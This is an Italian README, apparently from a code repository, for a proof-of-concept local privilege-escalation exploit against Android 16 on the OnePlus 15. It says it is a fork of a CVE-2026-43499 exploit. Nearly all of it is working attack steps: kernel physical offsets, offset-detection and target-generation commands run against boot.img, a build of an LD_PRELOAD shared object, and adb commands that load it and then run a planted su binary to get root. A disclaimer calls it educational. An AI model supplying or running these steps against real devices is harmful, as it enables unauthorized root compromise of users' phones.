
Proof-of-concept educativo per l'escalation dei privilegi locale su Android 16 su OnePlus 15, con rilevamento dell'offset del kernel, generazione del target e build dell'exploit basata su LD_PRELOAD.
ATTENZIONE: Questo repository è fornito solo a scopo educativo e di ricerca. Non vengono distribuiti binari precompilati o release. Devi compilare tutto dal sorgente.
Escalation dei privilegi locali su Android 16 per OnePlus 15.
Fork di x-spy/CVE-2026-43499-popsicle con una correzione dell'allineamento di kallsyms e un profilo verificato per OnePlus 15.
Il profilo contiene due indirizzi fisici che devono essere confermati da un dispositivo rooted con lo stesso firmware:
{
"p0_phys_offset": "0x80000000",
"p0_kernel_phys_load": "0xc7800000"
}
Rilevamento automatico con un dispositivo rooted:
python3 detect_offset.py
Richiede Python 3 e llvm-objdump:
python3 generate_target.py \
--boot boot.img \
--profile profile_oneplus15.json \
-o source/src/target.h
make -C source clean preload
Se NDK non viene rilevato automaticamente:
NDK_ROOT=/path/to/android-ndk make -C source clean preload
Output: source/build/bin/preload.so
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id